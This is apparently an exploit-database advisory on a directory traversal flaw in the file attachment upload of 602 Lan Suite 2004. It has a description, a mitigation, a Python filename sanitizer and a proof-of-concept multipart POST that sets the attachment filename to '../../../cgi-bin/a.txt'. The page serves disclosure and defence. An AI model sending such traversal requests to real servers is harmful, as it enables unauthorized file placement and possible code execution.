Vendor: 602 Lan Suite 2004
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: 602 Lan Suite 2004
Affected Version From: 2004.0.04.1221
Affected Version To: 2004.0.04.1221
Patch Exists: YES
Related CWE: N/A
CPE: a:software602:602_lan_suite_2004
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

602 Lan Suite 2004 File Attachment Upload Vulnerability

602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server. This vulnerability could lead to the execution of a malicious file on the server hosting the application.

Mitigation:

Ensure that the application properly sanitizes user-supplied input before using it in file operations.
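
One way to apply this mitigation to the attachment name carried in the upload request on this page, as an added example (not code from 602 Lan Suite or from the original advisory). The function names, the `uploads` directory and the allowlist are assumptions chosen for illustration; the sample header is constructed from the request's FILENAME part.

```python
import re
from email.parser import HeaderParser
from pathlib import Path

# Added illustration with hypothetical names, not the product's code.
# Constructed sample: the FILENAME part headers from the request on this page.
PART_HEADERS = (
    'Content-Disposition: form-data; name="FILENAME"; '
    'filename="../../../cgi-bin/a.txt"\r\n'
    "Content-Type: text/plain\r\n\r\n"
)

# Allowlist: starts and ends with an alphanumeric, so "." and "..", hidden
# files, trailing dots, separators ("/", "\\") and ":" are all excluded.
_NAME_OK = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9._-]{0,126}[A-Za-z0-9])?")
# Windows device names are unsafe as file names regardless of extension.
_RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{n}" for dev in ("COM", "LPT") for n in range(1, 10)
}


class UnsafeFilename(ValueError):
    """Raised when a client-supplied attachment name must not be used."""


def disposition_filename(part_headers: str) -> str:
    """Return the raw, untrusted filename parameter of a multipart part."""
    return HeaderParser().parsestr(part_headers).get_filename() or ""


def safe_attachment_path(upload_dir: Path, client_name: str) -> Path:
    """Map an untrusted attachment name to a path inside upload_dir."""
    if not _NAME_OK.fullmatch(client_name):
        raise UnsafeFilename(f"rejected attachment name: {client_name!r}")
    if client_name.split(".", 1)[0].upper() in _RESERVED:
        raise UnsafeFilename(f"reserved device name: {client_name!r}")
    root = upload_dir.resolve()
    dest = (root / client_name).resolve()
    # Defense in depth: the resolved path must sit directly in root.
    if dest.parent != root:
        raise UnsafeFilename(f"escapes upload directory: {client_name!r}")
    return dest


if __name__ == "__main__":
    try:
        safe_attachment_path(Path("uploads"), disposition_filename(PART_HEADERS))
    except UnsafeFilename as exc:
        print(exc)
```

Rejecting the name outright, rather than silently stripping the directory part, also leaves a clear event to log when a client submits a traversal sequence.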
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12495/info

602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server.

This vulnerability could lead to the execution of a malicious file on the server hosting the application.

602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected. 

POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540

-----------------------------287661860715985
Content-Disposition: form-data; name="U"

6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"

ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain

Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"

Attach
-----------------------------287661860715985--